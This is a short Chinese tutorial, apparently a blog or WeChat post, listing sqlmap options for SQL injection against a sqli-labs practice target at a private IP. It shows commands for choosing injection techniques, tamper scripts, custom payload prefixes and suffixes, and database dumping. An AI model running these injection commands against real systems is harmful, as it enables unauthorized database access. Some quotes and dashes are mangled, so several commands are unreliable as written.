任何关系走到最后,不过相识一场,有心者有所累,无心者无所谓,情出自愿,事过无悔,不负遇见,不谈亏欠。。。 一、指定数据库类型 --dbms http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --dbms mysql --dbs 二、指定操作系统 --os http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --os windows --dbs 三、解决编码问题 将所有结果转换为字符串,并用空格替换NULL结果 --no-cast 四、关闭字符串转义机制 –no-escape 五、设置无效值替换 –invalid-bignum 大整数替换 –invalid-logical 布尔操作替换 –invalid-string 随机字符串替换 六、自定义注入负载位置 –prefix 设置前缀 –suffix 设置后缀 sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --prefix="’)" --suffix=“and (‘abc’='abc” --dbs payload:id=(‘1’) and (‘abc’=‘abc’) 七、设置tamper脚本 sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --tamper “least.py,varnish.py” --dbs 八、设置dbms认证 sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --dbms-cred=“root:root” --dbs 九、设置具体sql注入技术 –technique B 布尔盲注 –technique E 报错注入 –technique U union查询注入 –technique S 堆叠注入 –technique T 时间盲注 –technique Q 内联查询注入 sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --technique T --time-sec 3 --dbs –time -sec 时间盲注时间为3 十、指定union字段数 sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --union-cols 12-18 --dbs 十一、指定union字符,默认是null sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --union-char aaa --dbs 禁止非法,后果自负 欢迎关注公众号:web安全工具库